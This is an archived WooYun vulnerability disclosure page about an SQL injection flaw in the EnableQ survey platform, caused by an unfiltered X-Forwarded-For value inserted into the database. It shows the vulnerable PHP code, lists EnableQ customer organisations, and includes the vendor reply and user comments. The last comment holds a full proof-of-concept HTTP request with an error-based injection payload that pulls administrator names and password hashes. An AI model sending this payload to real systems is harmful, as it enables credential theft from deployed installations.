当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(46) 关注此漏洞

缺陷编号: WooYun-2014-82118

漏洞标题: EnableQ全版本通杀sql注入(影响电信、金融、大型互联网公司、政府等)

相关厂商: 北京科维能动信息技术有限公司

漏洞作者: L.N.

提交时间: 2014-11-10 11:26

修复时间: 2015-02-08 11:28

公开时间: 2015-02-08 11:28

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 白盒测试

7人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-10: 细节已通知厂商并且等待厂商处理中
2014-11-13: 厂商已经确认,细节仅向厂商公开
2015-01-07: 细节向核心白帽子及相关领域专家公开
2015-01-17: 细节向普通白帽子公开
2015-01-27: 细节向实习白帽子公开
2015-02-08: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

程序简介:
EnableQ是历经400余家客户部署使用的,高可靠高可用的一体化调研管理平台系统,适用国内绝大多数用户众多应用场合和需求场景。多家国内顶级的专业市场调查公司采用EnableQ作为其数据收集和整理的核心系统,服务其商业化市场调研项目。
调查、咨询机构
北京华通明略信息咨询有限公司
北京零点市场调查与分析公司
北京邓白氏慧聪市场信息咨询有限公司
北京慧聪资道咨询有限公司
北京环亚市场研究社
北京勺海市场调查有限责任公司
北京新生代市场监测机构有限公司
拓索市场咨询(北京)有限公司
北京博思惠恩营销顾问有限责任公司
联信天下(北京)国际市场调查有限公司
北京宣亚培恩国际公关顾问有限公司
上海安旭市场调研服务有限公司北京分公司
北京博纳支点企业顾问公司
北京市中瑞信信息咨询有限公司
北京赛诺市场研究有限责任公司
北京赛诺经典管理咨询有限公司
北京赛诺营销顾问有限公司
北京思捷讯管理咨询有限责任公司
北京博万管理咨询有限公司
北京勤达信咨询有限责任公司
爱普邦德(北京)管理顾问有限公司
北京德信宏远信息技术有限公司
北京麦威信息咨询有限公司
北京西点方略营销顾问有限责任公司
北京思纬亿联营销咨询有限公司
北京安盛友邦药店管理顾问有限公司
中研国际时尚品牌管理咨询集团
北京龙品智合文化传媒有限公司
北京华财理账顾问有限公司
北京人卫医院管理中心
北京吉六教育咨询中心

上海慧辰咨道咨询有限公司
上海群思商务咨询有限公司
远鼎信息科技(上海)有限公司
励衿(上海)企业管理咨询有限公司
上海起航企业管理咨询有限公司
上海崇理企业管理咨询有限公司

深圳市银雁金融配套服务有限公司

广州优加市场调研有限公司
广州市准诚市场咨询有限公司
广州博力富软件科技有限公司

重庆立信市场研究有限公司
福建省质协用户评价中心
湖北正达银友传媒有限公司
宁波市远东零点市场调研咨询有限公司
沈阳新时源传媒广告有限责任公司
大连鸿博传媒有限公司
新疆乌鲁木齐市海景心理咨询有限公司

政府及直属事业单位

国家统计局农村社会经济调查司
国家信息中心经济咨询中心
国家新闻出版广电总局信息中心
国家体育总局体育信息中心
人力资源和社会保障部中国人事科学研究院
中国科学技术协会信息中心
中国国际贸易促进委员会经济信息部

云南省大理白族自治州人民政府
北京市统计信息咨询中心
湖南省娄底市统计局
国家统计局日照调查队
广东省广州市越秀区统计局

吉林省国家税务局
山东省济南市国家税务局
河北省邯郸市地方税务局

军队

总参谋部某部

电信

浙江移动通信有限责任公司金华分公司
中国移动通信集团安徽有限公司铜陵分公司

金融

中国人民银行营业管理部
广发基金管理有限公司
华夏基金管理有限公司
恒信金融租赁有限公司
天风证券股份有限公司

上市公司

中国南方航空股份有限公司 (上市股票代码:600029)
一汽轿车股份有限公司 (深市股票代码:000800)
弘成科技发展有限公司 (NASDAQ:CEDU)
方正科技集团股份有限公司 (上市股票代码:600601)
湖北宜化化工股份有限公司 (深市股票代码:000422)

企业

联想控股有限公司
金蝶友商电子商务服务有限公司(友商网:www.youshang.com)
上海商派网络科技有限公司(www.shopex.cn)

奥的斯电梯(中国)有限公司
真维斯服饰(中国)有限公司
万顺昌-瑞尔盛中国有限公司
TCL通力电子(惠州)有限公司
林德(中国)叉车有限公司
矢崎(中国)投资有限公司
广州市恩尼世贸易有限公司

甘肃白银银珠电力集团有限责任公司信息技术服务分公司
雷诺股份有限公司北京代表处
湖南益丰大药房医药连锁有限公司
北京顺驰置地达兴房地产开发有限公司
北京崇文新世界房地产发展有限公司
多维联合集团有限公司
上海承大网络科技服务有限公司
深圳市华盛置业有限公司

图书馆

中国医学科学院图书馆
北京联合大学应用文理学院图书馆

科研机构

中国科学院高能物理研究所
中国社会科学院马克思主义研究院
中国社会科学院新闻与传播研究所
中国水产科学研究院
中国医学科学院医学信息研究所
中国中医科学院中医临床基础医学研究所
中国林业科学研究院林业科技信息研究所
中国人民大学文化产业研究院
国家语言资源监测与研究中心少数民族语言分中心
贵州电力试验研究院
大港油田钻采工艺研究院
首都儿科研究所流行病室
北京外国语大学中国外语教育研究中心
北京城市系统工程研究中心

教育单位

中国科学院研究生院
复旦大学管理学院
同济大学经济与管理学院
中国人民大学劳动人事学院
北京师范大学教育培训中心
哈尔滨工业大学
东北财经大学中德会计学院
中国政法大学外国语学院
中国农业大学食品科学与营养工程学院
北京工业大学经济与管理学院
北京信息科技大学经济管理学院
郑州大学公共卫生学院
北京工商大学
苏州大学
中国美术学院
兰州大学网络教育学院
上海师范大学法政学院
东北师范大学学生就业指导服务中心
华中科技大学土木工程与力学学院
北京联合大学信息网络中心
北京青年政治学院
农业部管理干部学院
潍坊学院
山东万杰医学院
马鞍山职业技术学院
广东交通职业技术学院
北京市西城区教育研修学院
绍兴职业技术学院

厦门市思明区教师进修学校
昆明铁路机械学校

北京景山学校
北方交通大学附属中学
北京汇文中学
北京市第一六一中学
北京市第二十一中学
北京市第七中学
北京二龙路中学
北京市三里屯一中

文化、出版、媒体

新华通讯社<新华每日电讯>社
新华通讯社<经济参考报>社
<重庆晨报>社
天津市今晚传媒广告有限公司(天津今晚报社)
唐山劳动日报社
<新财经>杂志社
<中国科技财富>杂志社

山东电视台新媒体中心技术部
广东省梅州市广播电视台

外语教学与研究出版社

互联网

新浪网技术(中国)有限公司(新浪网:www.sina.com.cn)
北京天盈创智广告有限公司(凤凰网:www.ifeng.com)
北京车之家信息技术有限公司(汽车之家:www.autohome.com.cn)
北京世纪摇篮网络技术有限公司(摇篮网:www.yaolan.com)
上海喜讯文化传播有限公司(喜讯网:www.xixun.cn)
烟台金润科技有限公司(食品伙伴网:www.foodmate.net)
陕西省演出经纪人协会(中国演出网:www.zgycw.net)
北京唐友广告有限公司(糖友网:www.tnbzy.com)
北京睿思汇通移动科技有限公司(Rexsee:www.rexsee.com)

大陆之外

Linkful Software Partners Inc.(菲律宾)
香港科技大学土木与环境工程系

其他

中国环境科学学会
中国互联网协会
中国测绘学会
中国家用电器服务维修协会

更多名单受保密协议所限,未能公布...

危害:通杀sql注入漏洞。

详细说明:

获取ip处没有对获取到的访问ip做过滤,直接加入到数据库。

/r.php

code 区域
if ( $_POST['Action'] == "MemberAddSubmit" )
{
$theUserName = strtolower( trim( $_POST['administrators_Name'] ) );
$theNickName = strtolower( trim( $_POST['nickName'] ) );
$SQL = " SELECT administratorsName FROM ".ADMINISTRATORS_TABLE." WHERE LCASE(administratorsName)='".$theUserName."' AND isAdmin= 0 LIMIT 0,1 ";
$Row = $DB->queryFirstRow( $SQL );
if ( $Row )
{
_obfuscate_O396cn0GdXJmeA( $lang['error_system'], $lang['administratorsname_is_exist'] );
}
_obfuscate_C2phCzUeWU1HmdeEQgHLCA( "administrators", "phpCheck" );
$SQL = " INSERT INTO ".ADMINISTRATORS_TABLE." SET administratorsName='".$theUserName."',nickName='".$theNickName."',ipAddress='"._obfuscate_HRdvKW4v( )."',createDate='".time( )."',isAdmin=0,hintPass='".$_POST['hintPass']."',answerPass='".$_POST['answerPass']."',administratorsGroupID='".$ConfigRow['defaultGroupID']."',isActive= '".$ConfigRow['isActive']."' ";//其中ipAddress是用过_obfuscate_HRdvKW4v( )获取的
$passWord = $_POST['passWord'];
$SQL .= " ,passWord='".md5( trim( $passWord ) )."' ";
$DB->query( $SQL );
$lastInsertID = $DB->_GetInsertID( );
_obfuscate_bHE2DwQb2wGAX9xbnlzOWA( "administrators", $lastInsertID );
if ( 1 <= substr_count( $_SERVER['HTTP_USER_AGENT'], "rexsee" ) )
{
unset( $_POST['Action'] );
if ( $_POST['qid'] != 0 && $_POST['qid'] != "" )
{
_obfuscate_J2oaPRQEfwc3cTxc( $lang['register_succeed'], "a.php?qid=".$_POST['qid']."&qlang=".strtolower( $language ) );
}
else
{
_obfuscate_J2oaPRQEfwc3cTxc( $lang['register_succeed'], "Android/index.php" );
}
}
else if ( $_POST['qid'] != 0 && $_POST['qid'] != "" )
{
_obfuscate_J2oaPRQEfwc3cTxc( $lang['register_succeed'], "q.php?qid=".$_POST['qid']."&qlang=".strtolower( $language ) );
}
else
{
_obfuscate_J2oaPRQEfwc3cTxc( $lang['register_succeed'], "/" );
}
}



找到ip获取函数:

function _obfuscate_HRdvKW4v( )

{

if ( isset( $_SERVER ) )

{

if ( isset( $_SERVER['HTTP_X_FORWARDED_FOR'] ) )

{

$_obfuscate_zeUCF4yH = $_SERVER['HTTP_X_FORWARDED_FOR'];

return $_obfuscate_zeUCF4yH;

}

if ( isset( $_SERVER['HTTP_CLIENT_IP'] ) )

{

$_obfuscate_zeUCF4yH = $_SERVER['HTTP_CLIENT_IP'];

return $_obfuscate_zeUCF4yH;

}

$_obfuscate_zeUCF4yH = $_SERVER['REMOTE_ADDR'];

return $_obfuscate_zeUCF4yH;

}

if ( getenv( "HTTP_X_FORWARDED_FOR" ) )

{

$_obfuscate_zeUCF4yH = getenv( "HTTP_X_FORWARDED_FOR" );

return $_obfuscate_zeUCF4yH;

}

if ( getenv( "HTTP_CLIENT_IP" ) )

{

$_obfuscate_zeUCF4yH = getenv( "HTTP_CLIENT_IP" );

return $_obfuscate_zeUCF4yH;

}

$_obfuscate_zeUCF4yH = getenv( "REMOTE_ADDR" );

return $_obfuscate_zeUCF4yH;

}

没有对获取的ip做任何处理,形成注入。

漏洞证明:

测试官方站点:

3TUTI97H]$V297IE]{JJ9[4.jpg

修复方案:

过滤ip获取

版权声明:转载请注明来源 L.N.@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2014-11-13 08:40

厂商回复:

虽然知道和关注乌云很久,但自己企业在此上榜还是第一次。作为一个在特定领域活动的软件厂商,非常感谢大家对EnableQ系统软件的关注。真的,十分感谢乌云网友的帮助,能够帮助我们查找到这个安全漏洞,虽然我们在多次安全性检查中均未扫描出类此问题。我们希望从这个问题出发,再次排查所有的类此问题。该漏洞我们将向用户提供补丁解决方案,并在后续版本(>V9.30)中发行完善方案。再次感谢所有关心我们成长的所有朋友。

最新状态:

2014-11-13:该漏洞我们将向用户提供补丁解决方案,并在后续版本(>V9.30)中发行完善方案。


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2014-11-07 14:37 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:17 | 当我又回首一切,这个世界会好吗?)
    0

    ......

  2. 2014-11-07 14:43 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)
    0

    新浪、凤凰网都中招

  3. 2014-11-07 14:47 | 小马 ( 实习白帽子 | Rank:90 漏洞数:21 | 无个性不签名)
    0

    围观老牛

  4. 2014-11-07 14:48 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
    0

    好长的简要描述……

  5. 2014-11-07 19:13 | L.N. ( 路人 | Rank:29 漏洞数:4 | 不断进步····)
    0

    @疯狗 发现个问题,我图片上传错误了

  6. 2014-11-10 11:31 | 泳少 ( 普通白帽子 | Rank:255 漏洞数:82 | ★ 梦想这条路踏上了,跪着也要...)
    1

    ....

  7. 2014-11-10 11:34 | ′雨。 认证白帽子 ( 普通白帽子 | Rank:1332 漏洞数:196 | Only Code Never Lie To Me.)
    1

    偶像,, 竟然来发洞了。

  8. 2014-11-10 12:19 | 草榴社区 ( 普通白帽子 | Rank:109 漏洞数:26 | Rank:9999 漏洞数:1024 | 未满18周岁,不准...)
    1

    这个"简要"描述,这他妈长..

  9. 2014-11-10 12:27 | zeracker 认证白帽子 ( 普通白帽子 | Rank:1077 漏洞数:134 | 爱吃小龙虾。)
    1

    EnableQ全版本通杀sql注入(影响电信、金融、大型互联网公司、政府等) 吓人啊

  10. 2014-11-10 17:52 | L.N. ( 路人 | Rank:29 漏洞数:4 | 不断进步····)
    1

    @′雨。 很简单的洞。换种生活,自由一点的生活,想怎么玩就怎么玩,现在顾及少了

  11. 2014-11-10 17:53 | L.N. ( 路人 | Rank:29 漏洞数:4 | 不断进步····)
    2

    @′雨。 以后就跑wooyun来跟你抢通用了,哈哈哈!

  12. 2014-11-10 18:02 | L.N. ( 路人 | Rank:29 漏洞数:4 | 不断进步····)
    1

    @zeracker 后面是管理加的。

  13. 2014-11-10 22:39 | Azui ( 实习白帽子 | Rank:61 漏洞数:14 | 人有两件宝,双手和大脑。)
    1

    描述好吓人

  14. 2014-11-13 09:34 | pandas ( 普通白帽子 | Rank:701 漏洞数:51 | 国家一级保护动物)
    1

    厂商回复没看懂阿,漏洞存在你就给个1rank?1rank代表你很感谢,你是恨透了吧!

  15. 2014-11-13 09:59 | darkrerror 认证白帽子 ( 普通白帽子 | Rank:337 漏洞数:48 | 学习)
    1

    @pandas 真相

  16. 2014-11-13 10:04 | 北京科维能动信息技术有限公司(乌云厂商)
    1

    @pandas 没有你说到的恨。确是我们不懂这里的规矩。

  17. 2014-11-14 00:34 | L.N. ( 路人 | Rank:29 漏洞数:4 | 不断进步····)
    1

    低危 1rank。我也是醉了!@xsser

  18. 2014-11-14 08:39 | 北京科维能动信息技术有限公司(乌云厂商)
    1

    @L.N. 作为乌云上的一名新人,坦白地承认,对于乌云我们确实不熟悉,规则不清楚。现在看来,rank确是给低了,但又找不到修改的地方。给您造成的困扰,十分的歉意。

  19. 2014-11-14 09:46 | L.N. ( 路人 | Rank:29 漏洞数:4 | 不断进步····)
    1

    @北京科维能动信息技术有限公司 没事没事,小事!

  20. 2014-11-14 10:13 | 泳少 ( 普通白帽子 | Rank:255 漏洞数:82 | ★ 梦想这条路踏上了,跪着也要...)
    1

    @北京科维能动信息技术有限公司 @L.N. 白帽子能够及时反馈漏洞给厂商不在乎给予rank多少在乎厂商是否看重该漏洞以及是否及时把漏洞修复

  21. 2014-11-14 10:16 | 北京科维能动信息技术有限公司(乌云厂商)
    1

    @L.N. @泳少 我们非常重视这个漏洞,已经向相关用户发出风险提示,并且提供了补丁方案。但因为我们是软件厂商,软件安装在用户的服务器上,并且软件的版本更新需要一些时间。我们正在重查所有的关联方面,期望在下个版本发行时彻底解决问题。

  22. 2014-11-14 10:42 | xsser 认证白帽子 ( 普通白帽子 | Rank:297 漏洞数:17 | 当我又回首一切,这个世界会好吗?)
    1

    @L.N. =。=

  23. 2014-12-03 10:14 | pandas ( 普通白帽子 | Rank:701 漏洞数:51 | 国家一级保护动物)
    1

    这poc都在截图里了 T_T

  24. 2014-12-04 08:15 | h1ck5r ( 路人 | Rank:5 漏洞数:5 )
    1

    换个角度看世界。。。

  25. 2014-12-05 14:36 | wefgod ( 核心白帽子 | Rank:1829 漏洞数:176 | 力不从心)
    1

    居然是低!这个通杀啊

  26. 2015-02-08 11:32 | DloveJ ( 普通白帽子 | Rank:1407 漏洞数:147 | Web安全测试培训 QQ269787775)
    0

    @北京科维能动信息技术有限公司 重视才给1rank,醉了。。

  27. 2015-02-08 13:02 | 凌风 ( 实习白帽子 | Rank:38 漏洞数:17 | 像风一样无声)
    0

    才给这么点?以后谁还去挖啊

  28. 2015-02-08 20:09 | geekfree ( 实习白帽子 | Rank:82 漏洞数:9 | hello world)
    0

    求个zend decode方法

  29. 2015-03-24 12:54 | 1c3z ( 普通白帽子 | Rank:297 漏洞数:55 | @)!^)
    0

    学习了

  30. 2016-03-12 12:43 | 你大爷在此 百无禁忌 ( 路人 | Rank:18 漏洞数:9 | 迎风尿三丈 顺风八十米)
    1

    <poc>http://www.enableq.com/enableq/r.php?qlang=cn&amp;qid=&amp;step=1 POST /enableq/r.php?qlang=cn&amp;qid=&amp;step=1 HTTP/1.1 Host: www.enableq.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://www.enableq.com/enableq/r.php?qlang=cn&amp;qid=&amp;step=1 Cookie: PHPSESSID=lqu8boa4jmrtu4jk3kji20lj90 X-Forwarded-For: 127.0.0.1' and(select 1 from(select count(*),concat((select(select(select concat(administratorsName,0x7e,passWord) from eq_administrators limit 0,1))from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)# Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 419 administrators_Name=123%40qq.com&amp;nickName=123&amp;passWord=123456&amp;passWord2=123456&amp;hintPass=2&amp;answerPass=123&amp;option_1=123%40qq.com&amp;option_2=123%40qq.com&amp;option_3=123%40qq.com&amp;option_4=123%40qq.com&amp;option_5=123%40qq.com&amp;option_6=123%40qq.com&amp;option_7=123%40qq.com&amp;option_8=123%40qq.com&amp;option_9=123%40qq.com&amp;option_10=123%40qq.com&amp;option_11=123%40qq.com&amp;option_12=123%40qq.com&amp;Action=MemberAddSubmit&amp;submit=%D7%A2%B2%E1&amp;qid=</poc> 请叫我雷锋

登录后才能发表评论,请先 登录